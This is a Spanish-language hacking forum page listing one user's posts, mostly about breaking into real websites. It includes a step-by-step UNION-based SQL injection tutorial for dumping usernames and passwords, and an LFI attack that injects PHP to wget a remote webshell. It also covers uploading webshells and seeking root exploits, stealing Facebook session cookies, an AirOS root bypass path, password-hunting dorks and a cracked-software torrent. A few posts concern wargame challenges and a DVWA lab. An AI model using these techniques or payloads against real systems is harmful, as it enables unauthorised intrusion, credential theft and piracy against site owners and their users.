Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - ruben_linux

#1
Nivel Web / tengo la webshell, ahora el exploit
24 Diciembre 2013, 16:52 PM
un saludo a todos.
hace un monton de tiempo que no pasaba por aqui, tenia el tema un poco olvidado.

El asunto es que consegui subir una webshell a un servidor, pero solo tengo acceso al usuario de la web q subi la shell.
Ahora tengo en mente subir un exploit y ganar acceso root.

La pregunta es cual es la mejor forma de hacerlo?? puedo usar armitage, o subir el exploit desde la webshell, pero no se si podre compilar y ejecutar el exploit??

gracias.
#2
Queria compartir con vosotros esta web, tiene unos videotutoriales muy interesantes.

Adobe

    After Effects (39 Videos)
    DreamWeaver (41 Videos)
    Flash (6 Videos)
    Photoshop (9 Videos)
    Premiere Pro (12 Videos)

Computer Programming

    Android Development (200 Videos)
    C (15 Videos)
    C# (200 Videos)
    C++ (73 Videos)
    C++ GUI with Qt (14 Videos)
    Cocos 2D (20 Videos)
    Computer Game Development (17 Videos)
    iPhone Development (37 Videos)
    Java - Beginner (87 Videos)
    Java - Intermediate (59 Videos)
    Java - Game Development (36 Videos)
    Java - Game Development with Slick (12 Videos)
    javascript (40 Videos)
    jQuery (200 Videos)
    Objective-C (65 Videos)
    PHP (200 Videos)
    PHP Stock Market Analyzer (20 Videos)
    Python (43 Videos)
    Ruby (32 Videos)
    Trading Website (Project Lisa) (45 Videos)
    Visual Basic (200 Videos)
    wxPython (14 Videos)

Computer Science

    3Ds Max 2010 (22 Videos)
    How to Build a Computer (23 Videos)
    HTML5 (53 Videos)
    MySQL Database (33 Videos)
    Networking (6 Videos)
    UDK - Beginner (65 Videos)
    UDK - Advanced (2 Videos)
    XHTML & CSS (46 Videos)

Educational

    Algebra (32 Videos)
    Basic Math (11 Videos)
    Biology (22 Videos)
    Chemistry (38 Videos)
    How to Build a Go Kart (35 Videos)
    Introduction to Geometry (63 Videos)
    Geometry (23 Videos)
    Physics (45 Videos)
    Robotics & Electronics (19 Videos)

Other

    Battlefield 2 Gameplay (6 Videos)
    Backgammon (8 Videos)
    Bucky Roberts Live (10 Videos)
    Buckys Vlog (5 Videos)
    Call of Duty Gameplay (18 Videos)
    iPhone App Reviews (25 Videos)
    thenewboston Live! (113 Videos)
    thenewboston Podcast (39 Videos)
    Surviving the Wilderness (20 Videos)
    Surviving the Wilderness 2 (40 Videos)

http://thenewboston.org/tutorials.php
#3
Tengo un problema, espero que me puedan ayudar. Lo primero no se si esto tiene que ir en esta sección, si no es asi, porfavor muevanlo a donde
corrresponda.

Como puede saber a que aplicacion corresponde un archivo?

Me explico, digamos que en una url, tenemos lo siguiente: www.*/home.php

Lo que quiero saber es a que aplicacion corresponde ese archivo, supongo que muchas aplicaciones tienen tal archivo, pero como puedo saber a cual
corresponde??
#4
 Reupload Acunetix 8 0 2012 02 09 Crack by x9a3k Torrent Download
     
    Torrent Files list:
    -----------------------
    2012_02_09_01_webvulnscan8.exe 14 MB
    Activation.exe 2 MB
    Read Me.txt 0 MB
    Torrent downloaded from Demonoid.txt 0 MB
    wvs.exe 11 MB
     
    Torrent download links:
    -----------------------
    http://thepiratebay.org/torrent/7050908/Reupload_-_Acunetix_8.0_2012.02.09___Crack_by_x9a3k
    http://bitsnoop.com/reupload-acunetix-8-0-2012-02-09-q34815914.html
#5
GNU/Linux / ayuda con el copmando grep
3 Septiembre 2012, 18:16 PM
El caso es que tengo un "txt" con una serie de palabras que necesito buscar en otro directorio con varios archivos "txt".

/home/ruben/fuente.txt---> las palabras que quiero buscar
/home/ruben/*.txt --------> los archivos en los que quiero buscar

he probado a pasar la salida de cat a grep (cat /home/ruben/fuentes.txt | grep /home/ruben/*.txt) pero no funciona, tambien, añadi las opciones -f y -w a grep y sigue sin funcionar.

buscando por la red di con este script, pero tampoco consigo el resultado deseado.

for name in `cat /home/ruben/fuente.txt `
do
grep $name /home/ruben/*.txt >> salida
done
#6
Dudas Generales / una ip varias web's
1 Septiembre 2012, 00:45 AM
Saludos gente. Pululando por la red, me encontré con una web que es vulnerable a sqli, claro, no me pude resistir, trastee un rato con sqlmap.
Después de descargarme user:pass, empece a buscar más info sobre el host, para poder hacer un dork, sonde se aloja, puertos, openvas, ....

El caso es que descubrí que tenia varias webs alojadas en la misma ip, esto es VirtualHost.

La pregunta es:
A que web pertenecen los user:pass??

Cuando quiero validar un user, me tira varios:

CitarWarning: session_start() [function.session-start]
Warning: Unknown: open(/home/users/web......failed: No such file or directory (2) in Unknown on line 0

Esto me hace pensar que ya no esta la carpeta de ese user, ni la de ningún otro.

ustedes que opinan??
#8
el caso es que tengo acceso a 3 web como admin, pero cuando trato de subir un .php con la webshell, en lugar de una foto, despues no me aparece la shell.

alguna idea? ya probé a subirla en .php.jpg, .php.gif, .php.png .... en lugar de que otro documento puedo sustituirla??

la parte dificil ya esta, me falta la artistica  ;)
#9
Hacking / admin bypass remote
8 Junio 2012, 21:42 PM
"encontre" una web vulnerable a este tipo de problemas. Es sencillo iniciar la sesion de admin con el clasico

Login: ' or '1'='1
pass : ' or '1'='1

El caso es que mirando el código de la web no se interpretarlo bien, y me gustaría si alguien puede ayudar para después subirlo a .

Las variables no son comprobadas, pero me gustaria que alguien lo interpretara y me ayudara con la noticia. Esta es una parte del codigo:

$.ajax({
            type: "POST",
            url: "login.asp",
            dataType: "application/x-www-form-urlencoded",
            data: "username=" + $("#txtName").val() + "&userpassword=" + $("#txtPassword").val(),
            async: false,
            complete:function(r1,r2){},
            success: function(msg) {
#10
En esta ocasión, uso la herramienta wireshark para robar la cookie de una sesión facebook, para poder hacer esto, tenemos que estar en la misma red que nuestra victima, ademas, una vez robada la cookie, tenemos que usara, no sirve para usar mas tarde.

Uso la herramienta live HTTP header para modificar la cookie, quiero decir: que cambio la que mande mi navegador por la que uso la victima.

[youtube=425,350]http://www.youtube.com/watch?v=ISJUacTFJtY&list=UUMcniGC9L2QuudUU_cslf2g&index=2&feature=plcp[/youtube]

[youtube=425,350]http://www.youtube.com/watch?v=RRvNlu03SAc&list=UUMcniGC9L2QuudUU_cslf2g&index=1&feature=plcp[/youtube]
#11
Estoy aprendiendo Python, y necesito ayuda. Tengo este código:

#!/usr/bin/python

import urllib2, urllib, os


auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm=''  uri='http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/', user='admin',   passwd='123456')

opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)

respuesta = urllib2.urlopen('http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/')

os.system("firefox http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/index.php")


siguiendo esta guía: 20.6. urllib2 ? extensible library for opening URLs — Python v2.7.2 documentation

Pero algo estoy haciendo mal, porque no obtengo los resultados deseados.

El objetivo de este programa es pasar los datos user y pass de la autentificacion de administrador joomla, que tengo en mi pequeño laboratorio de casa, y que esta me abra una nueva ventana con la pantalla del panel de control, osea, con el admin ya identificado.

para esta parte uso:

import os

os.system("firefox www.google.com")


como cambio google por la url que necesito

http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/index.php

este es el fallo que me devuelve:

Citarruben@coyote:~/UBNT$ ./boa.py
  File "./boa.py", line 7
    auth_handler.add_password(realm=''  uri='http://192.168.56.101/Joomla_1.5.20-Spanish-pack_completo/administrator/';, user='admin',   passwd='123456')
                                                          ^
SyntaxError: invalid syntax

NOTA: la "^" en el mensaje original, esta situada debajo de la "i" de "uri="
#12
Noticias / 0day en AirOS (Acceso como Root)
28 Diciembre 2011, 19:58 PM
0day en AirOS (Acceso como Root)

CitarAirOS remote root 0day

since some genius decided to write worm for this, here is early santa for you, kids:

1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?

IRCNet opers: expect some decent KNB bot mayhem for a while :)

AirOS creado por Ubiquiti se basa en un sistema operativo avanzado capaz de manejar un poderoso sistema inalámbrico y funciones de enrutamiento, desarrollado con una interfaz de usuario simple, limpia e intuitiva (a diferencia con otros sistemas).

trae por defecto de fabrica: Usuario: ubnt y Contraseña: ubnt

http://www.airos.com/descargas/manuales/guideAirosLinux.pdf
http://wireless.orosal.es/ubnt/manual_ps2_ns2.pdf

fuente:http://www.blackploit.com/
#13
Hacking / sqli en dvwa
26 Diciembre 2011, 01:40 AM
dvwa = http://www.dvwa.co.uk/

una aplicación vulnerable, con todo tipo de fallas para que juguemos

[youtube=425,350]http://www.youtube.com/watch?v=vntfwkFfgD0[/youtube]

aquí muestro como hacer sqli con sqlmap usando la opción cookie
#14
Nivel Web / ayuda con LFI
11 Diciembre 2011, 23:27 PM
Tengo un par de web que son vulnerables a LFI. Puedo ver varios archivos como:

Citarhttp://www.xxxxxx.com/index.php?XXX=%2F..%2Fetc%2Fpasswd%00
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fetc%2Fgroup%00
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fnet%2Farp
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fcpuinfo
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fpartitions
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2Fversion
http://www.xxxxxx.com/index.php?XXX=%2F..%2Fproc%2F1%2Fmounts

pero no puede ver

etc/self/environ

porque?

En otra web que si puedo verlo:

CitarDOCUMENT_ROOT=/home/*********/public_html�GATEWAY_INTERFACE=CGI/1.1�HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8�HTTP_ACCEPT_CHARSET=TIS-620,utf-8;q=0.7,*;q=0.7�HTTP_ACCEPT_ENCODING=gzip,deflate�HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5�HTTP_CONNECTION=keep-alive�HTTP_HOST=www.***************.com.pt�HTTP_KEEP_ALIVE=115�HTTP_USER_AGENT=AQUI DEBE IR LA SHELL�PATH=/bin:/usr/bin�QUERY_STRING=content=*******/*******.php/../../../../../../proc/self/environ�REDIRECT_STATUS=200�REMOTE_ADDR=***.***.***.***�REMOTE_PORT=47433�REQUEST_METHOD=GET�REQUEST_URI=/*****.php?**********=***/*****.php/../../../../../../proc/self/environ�SCRIPT_FILENAME=/home/******/public_html/index.php�SCRIPT_NAME=/index.php�SERVER_ADDR=***.***.***.***�SERVER_ADMIN=webmaster@**********.com.**�SERVER_NAME=www.***********.com.**�SERVER_PORT=80�SERVER_PROTOCOL=HTTP/1.1�SERVER_SIGNATURE=�
SERVER_SOFTWARE=Apache�UNIQUE_ID=**************_****�

cuando sustituyo el campo USER-AGENT con live http header, para subir una webshell

<?system ('wget http://rutadeunawebshell.com/shell.txt -o shell.php');?>

esta opcion me aparece vacia an la ventana del firefox, y cuando trato de ir a la webshell, no esta.

CitarNot Found

The requested URL /shell.php was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Alguien puede explicarme el porque?
estoy haciendo algo mal? (aparte de lo obvio)
#15
Hacking Wireless / #breaking80211
7 Diciembre 2011, 23:11 PM
--- Contenido ---
  • Introducción

  • Materiales/Herramientas utilizados

  • Conceptos básicos
    [-] Cambiar dirección MAC
    [-] Modo monitor

  • Cifrado WEP
    [-] Ataque 1+3
    [-] Ataque Chop Chop
    [-] Ataque fragmentación
    [-] Hirte Attack
    [-] Caffe Late Attack

  • Cifrado WPA
    [-] Obteniendo el handshake
    [-] Obteniendo la contraseña: Aircrack-ng
    [-] Obteniendo la contraseña: coWPAtty
    [-] Obteniendo la contraseña: Pyrit
    [-] Obteniendo la contraseña: Rainbow Tables
    [-] Rainbow Tables -> coWPAtty
    [-] Rainbow Tables -> Pyrit

  • Otras defensas
    [-] Filtrado MAC
    [-] Ataque de desasociación
    [-] ESSID oculto

  • Descifrar capturas
    [-] Airdecap-ng + WEP
    [-] Airdecap-ng + WPA

  • Ataques sociales -- Creación de puntos de acceso
    [-] Airbase-ng + brctl
    [-] Airbase-ng + iptables

  • Ataque sociales -- Ataques en LAN
    [-] DNS-spoofing con Ettercap y Metasploit
    [-] S.E.T.

  • Ataques sociales -- Todo en uno
    [-] Karmetasploit

  • Documentación
Citardescargas:
http://www.megaupload.com/?d=ES4KXK52
http://www.exploit-db.com/download_pdf/18144
leer on-line:
http://es.scribd.com/doc/73364142/breaking80211-by-Aetsu

fuente:http://0verl0ad.blogspot.com/
#16
Seguridad / tengo las pass, busco user
6 Diciembre 2011, 15:33 PM
1. generé el HASH en md5 una pass que nos queramos, me explico, desde http://md5crack.com/ por ejemplo, generamos un hash en md5, supongamos "123456" da como resultado "e10adc3949ba59abbe56e057f20f883e"

2. en nuestro buscador preferido buscamos los archivo con extensión php que contengan nuestro md5. Esto seria asi: "e10adc3949ba59abbe56e057f20f883e" filetype:php

[youtube=425,350]http://www.youtube.com/watch?v=smIP0nSkBQ8[/youtube]
#17
Nivel Web / carpeta wp-admin al descubierto.
21 Noviembre 2011, 22:55 PM
Un saludo a todos.

Tengo acceso a una carpeta ../wp-admin/ de una web, como puedo aprovechar esta mala configuración?
Supongo que  de algo servirá, pues puedo ver la mayoría de los .php (setting, users, admin, theme, ....)

Tengo que avisar que ando junto de php, aunque algo entiendo :-)
#18
Nivel Web / webshell inyectada, pero no la encuentro
19 Noviembre 2011, 13:53 PM
Tengo acceso a un servidor en el que puedo subir una webshell, pero una vez subida no la encuentro, he probado nikto y dirbuster.

Alguien puede ayudarme? la idea es crear un videotuto
#19
Dudas Generales / posible falla????
31 Octubre 2011, 19:34 PM
Tengo una duda sobre un posible fallo en una web.
El caso es que trasteando, cuando modificas la url, de esta manera

www.XXXXXXXX.com/asdf

me devuelve la pagina mal cargada, con este error:

CitarAn error occurred
Page not found
Exception information:

Message: Invalid controller specified (asdf)
Stack trace:

#0 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))
#1 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Application/Bootstrap/Bootstrap.php(97): Zend_Controller_Front->dispatch()
#2 /var/www/vhosts/XXXXXXXXX.com/httpdocs/library/Zend/Application.php(366): Zend_Application_Bootstrap_Bootstrap->run()
#3 /var/www/vhosts/XXXXXXXX.com/httpdocs/index.php(71): Zend_Application->run()
#4 {main} 

Request Parameters:

array (
  'controller' => 'asdf',
  'action' => 'index',
  'module' => 'default',


La pregunta es si alguien sabe, si esto es una falla explotable?
#21
Foro Libre / tipos de hash
18 Septiembre 2011, 22:53 PM
DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), then there follows the actual hash.

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

..... y muchos mas....

fuente:http://forum.insidepro.com/viewtopic.php?t=8225
#22
Nivel Web / dork zend de exploit-db
11 Septiembre 2011, 22:39 PM
Los Dork's son peligrosos, eso todos lo sabemos, bueno, pues aqui les dejo un ejemplo de como se pueden usar. La verdad no tinen ninguna ciencia.

En concreto este:

Google search: filetype:ini "Bootstrap.php" (pass|passwd|password|pwd)
Submited: 2011-08-25

http://www.youtube.com/watch?v=KJCnUlv-Xj4
#23
Nivel Web / vulnerable a injeccion remota SQL
31 Agosto 2011, 23:33 PM
Citar**********************************************
********************ruben_linux***************
**********************************************
******vulnerable a injeccion remota SQL*******

autor==>ruben_linux
equipo=>ruben_linux

fuente: http://packetstormsecurity.org/files/view/104643/arsolutions-sql.txt

;-) ;-)
#24
Nivel Web / sqli+bug+exploit=videotuto
25 Agosto 2011, 23:47 PM
Saludos a todos. Soy ruben_linux, voy enseñar como hago SQLi

1.- buscamos victima.

inurl:software/categoria.php?

2.- exploit

+and+1=0

3.- buscamos union select

Citarhttp://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+1--

4.- buscamos las tablas

Citarhttp://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--

5.- buscamos las columnas

Citarhttp://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--

6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios.

Citarhttp://www.xxxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1--
vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass

podemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más.

[youtube=425,350]http://www.youtube.com/watch?v=uuEbGos9Cwg[/youtube]
#25
select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1--

voy cambiando el limit y me va dando las parejas.

Pero seguro que hay alguna manera de sacarlos todos juntos, pq así dejas mucho rastro, me refiero que en el server quedan registradas las peticiones SQLi, una web por la que pase el otro día, me dejo una atenta nota, pero al cambiar la ip ya me dejaba volver.

Este es otro tema por el que tengo curiosidad, vosotros borráis las huellas?? como?? o solo usáis proxy??
#26
Haciendo SQLi pude encontrar una lista de pass

x5h77h:
083a38:
mihrpt:
xoma03:

El caso es que no se en que formato estan. Alguien puede ayudarme?? no encuentro nada.
#27
Buenas a todos. Este es mi primer pos en este foro despues de la presentacion. Como anillo al dedo me viene, pues este tuto me lo he currado en un dia, mientras hacia SQLi, para no perder detalle.

Empezamos.

1. buscar una web vulnerable, a esta parte no le dedico tiempo, todos conocemos los DORKs, packetstorm, vbulletin.....


2. Como se que esta web es vulnerable??? Facil, la mayoria de las web te devolveran, cuando les modiques la peticion a algo como esto:

CitarWarning: mysql_query() [function.mysql-query]: Access denied for user '*******'@'localhost' (using password: NO) in /home/justonli/public_html/demo_online_store/themes/2/func_util.php on line 3

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/********/public_html/demo_online_store/themes/2/func_util.php on line 3

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/*********/public_html/demo_online_store/themes/2/func_util.php on line 4

Warning: mysql_query() [function.mysql-query]: Access denied for user '***********'@'localhost' (using password: NO) in /home/*********/public_html/demo_online_store/themes/2/index.php on line 39

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/********/public_html/demo_online_store/themes/2/index.php on line 39

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/*********/public_html/demo_online_store/themes/2/index.php on line 40

En mi caso usé otro DORK. Que como se modifica una peticion?? Pues en la barra de direccion, donde esta la URL, algunas webs ponen algo como:

index.php?id=1
search.php?ID=25


Si nosotros cambiamos en la barra de direccion el 1 o el 25 por algo como -1, ', '2, etc, la web que no esta preparada para recibir estos datos nos devuelve un error como los de arriva. En mi caso le añadi "+and+1=0" (sin comillas).

Ya sabemos cuando es vulnerable.

3. Como aprobecho esa Vulnerabilidad??? pues hay varias formas, yo explicaare la que use.
Tenemos que encontrar el numero de "Union Columns" que con mi poco ingles supongo que sera "uninon de columnas" :-) esto es el numero de comunlas del la tabla que tiene la base de datos, para entender esto: en la base de datos <deportes> tenemos la tabla <acuaticos> y dentro de esta columna <surf>, que contiene srfing, bodyboard, sky_surfing,... pues en las web que almacenan bd sulen tener algo como <db_usuarios> y dentro la tabal <user> y una columna con el nombre <pass>. Dentro de una bd tendremos muchas tablas y dentro de estas cada una tendrá varias columnas.

En mi caso son 25, para averiguar esto:

http://victima.es/main.php?id=-1
http://victima.es/main.php?id=-1+union+select+1,2--
http://victima.es/main.php?id=-1+union+select+1,2,3--
http://victima.es/main.php?id=-1+union+select+1,2,3,4--
http://victima.es/main.php?id=-1+union+select+1,2,3,4,5......etc


Vamos añadiendo numeros hasta que nos de el resultado de la img.


By rubenlinux at 2011-08-22

http://****.it/web1/**********&macrocategoria_cliccata=1004+and+1=0+%20Union%20Select%20%201%20,2%20,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--

y nos muestra unos numeros en la pantalla, en lugar de la web.

En mi caso muestra un "2".

Esta es la posicion donde tenemos que meter las peticiones SQL. Tendremos que sustituir el numero, por la peticion.

Ahora queremos saber el nombre de las tablas. Para esto añadimos en la posicion del numero "2" esto "group_concat%28table_name%29%" y al final de la url "from+information_schema.tables" esto traducido seria algo como: dame el nombre de todas la tablas que tienes en information.schema


By rubenlinux at 2011-08-22

http://******.it/web1/master.php**********&macrocategoria=1004&macrocategoria_cliccata=1004+and+1=0+%20Union%20Select%20%201%20,group_concat%28table_name%29%20,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables


Ya tenenos las tablas, en mi caso estan en Italiano, nos interesa conocer el numero de columnas dentro de la tabla por la cual tenemos curiosidad, para esto cambiamos lo que escribimos antes en el lugar del "2" por "group_concat%28column_name%29%" esta vez preguntamos por las columnas de una tabla, tambien cambiamos el final por "+from+information_schema.columns+where+table_name=%20char%2895,117,116,101,110,116,105%29".

Donde el número "95,117,116,101,110,116,105" es el nombre de la tabla,pero con los caracteres ascii. En internet teneis un monton cuadros y programillas para pasarlo.


By rubenlinux at 2011-08-22

Ya casi terminamos, lo que ahora queremos es saber que tenemos en cada columna, la pregunta seria algo como: que hay dentro de la columna pass dentro de la tabla usuarios dentro de la bd_principal? mas o menos. En este caso tenemos que hacer una nueva peticion con: "concat_ws%28char%2858%29,NOMBRE_DE_LA_COLUMNA%29" en el lugar del numero "2" y al final "+from+NOMBRE_DE_LA_TABLA"

http://*****.it/web1/***********&macrocategoria=1004&macrocategoria_cliccata=1004+and+1=0+%20Union%20Select%20%201%20,concat_ws%28char%2858%29,NOMBRE_DE_LA_COLUMNA%29%20,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+NOMBRE_DE_LA_TABLA
#28
Me encontre con esto, pero ahora no se que hacer. No tengo intencion de j**** la web de nadie. no se si esta bien mostrar esto.

Se que esto no es ninguna novedad, me di cuenta cuando empezaron a aparecer montones hackeadas, que si los sirios, que si los chinos, ....
y yo por medio sin saber que hacer con una de estas. Mañana empiezo a documentarme.


http://subefotos.com/ver/?6cf0425f76dc112d827723460dfde689o.png

http://subefotos.com/ver/?f09c43e4a60c145714f9b8ba2c222347o.png

http://subefotos.com/ver/?5f2109b415dc1fa36c659989a1ffe0ddo.png

#29
WarZone / Hack-Web_Foro
17 Agosto 2011, 02:19 AM
Saludos a tod@s. Estoy bloqueado en esta prueba, os dejo mis experiencias/pruebas, para animaros a contestarme, aunque esto no es una pregunta.  :)

Sabemos que tiene filtrado, y buscando sobre este tema, encontré mucho en google:

magic quotes. Este filtro se ocupa de adherir una \ a las comillas que pongamos en nuestro código malicioso.

Strip_Tags . Esta función se encarga de eliminar de una variable todo lo que esté entre < >, elimina etiquetas html.

htmlspecialchars. Convierte caracteres especiales en entidades HTML(para codigo PHP)

PHP Input Filter. es una clase escrita en PHP que permite filtrar código malicioso ingresado en los formularios para prevenir ataques XSS de manera sencilla, tiene la cualidad de no limpiar determinadas etiquetas o atributos.

Bueno, y así toda la vida.....

Que nos interesa a nosotros, pues ni p*** idea, porque no se programar, perooooooo.
Bueno el caso es:

en el area de texto introducimos: "<script>alert('XSS')</script>"
en la web se nos muestra: "alert(\'XSS\')"
y en codigo fuente vemos: <div style="overflow: auto; width: 100%;">alert(\'XSS\')</script></div>

Podemos fijarnos, que en el código, no muestra toda la etiqueta "<script>". Eso por que es??? es ese el filtrado????

Otra prueba:

en el area de texto introducimos:&lt;script&gt;alert()&lt;/script&gt;
en la web se nos muestra: <script>alert()</script>
en el codigo fuente vemos: <div style="overflow: auto; width: 100%;">&lt;script&gt;alert()&lt;/script&gt;</div>

Esta vez no filtra los caracteres especiales, porque ya están codificados con "htmlspecialchars" de la que ya os hable antes.

Otras pruebas:

He intentado añadir HTML al final de mi xss para cerrar asi el "<div>" pero esto tampoco funciona, en la fuente siempre aparece un "</div>" al final de linea que impide seguir a delante.

Para mi, el camino que tiene mejor pinta es el de "htmlspecialchars" puesto que conseguí que publique "<script>" y "</script>" que con las otras formas no pude, la cosa ahora es, que se ejecute ese maldito codigo, para lo cual pienso que necesito mas tag´s en mi declaración.

Porfavor, comentar.
#30
WarZone / reto: JWS
12 Agosto 2011, 18:34 PM
Saludos a tod@s.

En el reto JWS, he modificado las cookies de la siguiente manera:

CitarGET
http://warzone.elhacker.net/jsw/src.php?ok=oooook&confrim=523******84dc420088add6*****

Cookie: PHPSESSID=523******84dc420088add6d*******; ........

Y el resultado es:

Citarcorrecto='E*******';alert("Hay un error, actualiza la pagina, o activa tus cookies");top.location.reload();
tapo el nombre por si es importante, que no lo se¿?

Y si tengo las cookies activas.

despues cuando actualizo, esto es lo que me devuelve:

Citar/*Alt Size Decryptor Function, by Alice Morgan*\ function asdf(q){document.cookie.dcr=new function(pp)return document.cookie.dcr(((hex(q)-'C')*8.64+((bin(q)*7)/11)).susbtr(5,5))} \*a******@***.edu*/respuesta.corecta=self.location.href;function dc(s){if(respuesta.corecta.charAt(1)=='i'){return asdf('C1 32 C1 25 C1 33 C1 30 C1 35 C1 25 C1 33 C1 34 C1 21 C0 2E C1 23 C1 2F C1 32 C1 32 C1 25 C1 23 C1 34 C1 21 C0 3D C0 22 C1 13 C1 25 C1 23 C1 35 C1 32 C1 29 C1 34 C1 39 C0 2D C1 06 C1 2F C1 23 C1 35 C1 33 C0 22 C0 3B C0 0D C0 0A C1 37 C1 28 C1 29 C1 2C C1 25 C0 28 C1 32 C1 25 C1 33 C1 30 C1 35 C1 25 C1 33 C1 34 C1 21 C0 2E C1 23 C1 2F C1 32 C1 32 C1 25 C1 23 C1 34 C1 21 C0 2E C1 2C C1 25 C1 2E C1 27 C1 34 C1 28 C0 3C C0 31 C0 35 C0 30 C0 30 C0 30 C0 29 C1 3B C1 32 C1 25 C1 33 C1 30 C1 35 C1 25 C1 33 C1 34 C1 21 C0 2E C1 23 C1 2F C1 32 C1 32 C1 25 C1 23 C1 34 C1 21 C0 2B C0 3D C0 22 C1 1C C1 2E C1 05 C1 32 C1 29 C1 23 C1 2B C1 33 C1 2F C1 2E C0 22 C1 3D ');}else{return asdf(s)}}eval(dc('C1 32 C1 25 C1 33 C1 30 C1 35 C1 25 C1 33 C1 34 C1 21 C0 2E C1 23 C1 2F C1 32 C1 32 C1 25 C1 23 C1 34 C1 21 C0 3D C1 35 C1 2E C1 25 C1 33 C1 23 C1 21 C1 30 C1 25 C0 28 C0 22 C0 25 C0 36 C0 36 C0 25 C0 33 C0 36 C0 25 C0 33 C0 33 C0 25 C0 33 C0 36 C0 25 C0 36 C0 35 C0 25 C0 36 C0 33 C0 25 C0 33 C0 33 C0 25 C0 33 C0 36 C0 25 C0 33 C0 37 C0 25 C0 33 C0 31 C0 25 C0 33 C0 38 C0 25 C0 36 C0 32 C0 25 C0 33 C0 33 C0 25 C0 33 C0 38 C0 25 C0 33 C0 34 C0 25 C0 33 C0 38 C0 25 C0 36 C0 33 C0 25 C0 33 C0 34 C0 25 C0 36 C0 34 C0 25 C0 33 C0 37 C0 25 C0 33 C0 39 C0 25 C0 33 C0 37 C0 25 C0 33 C0 33 C0 25 C0 33 C0 32 C0 25 C0 33 C0 31 C0 25 C0 33 C0 30 C0 25 C0 36 C0 32 C0 25 C0 36 C0 34 C0 25 C0 33 C0 31 C0 25 C0 33 C0 37 C0 25 C0 36 C0 36 C0 25 C0 36 C0 35 C0 22 C0 29 C0 3B '));

alguien me puede ayudar con esto? no se mucho de programación, por no decir nada.
#31
WarZone / reto:web-hack_EAS
11 Agosto 2011, 18:06 PM
consigo entrar como todos los profesores, pero que es esto?? los recordatorios son pistas de algo??

recordatorios:
Pensamiento Humano - ENSEÑAR QUE ES PENSAMIENTO CREATIVO
Química - ENSEÑAR QUIMICA
Lenguaje - DEJAR LEER DONQUIJOTE

:huh: :huh:
#32
Estoy empezando con el reto: Hack-Web_Spoof

Tengo una duda, si añado una cabecera del protocolo http la "IP" (remote adress)
No es estrictamente una cabecera del protocolo HTTP, sino del protocolo TCP/IP. Expresa la identificación numérica de una máquina

podría hacerme pasar por " 3133.12.34.256" se que esta fuera de rango y que eso es una pista, pero aun estoy googleando, y me surge esta duda.
#33
WarZone / reto:cocinar+pista=resuelto
9 Agosto 2011, 21:45 PM
lo conseguí. ;-) ;-)

ahora se algo más sobre las cookies.

Una pista, la cookie esta codificada en:

**** *4
#34
El titulo es muy explicativo.

1.- registras un user
2.- entras con ese user, y te guarda una cookie, no permamente, solo hasta que cierres el navegador
3.- modificar esa cookie para acceder como otro user (admin) pero sin los permisos, solo es un juego :-)

Objetivo: modificar la cookie.
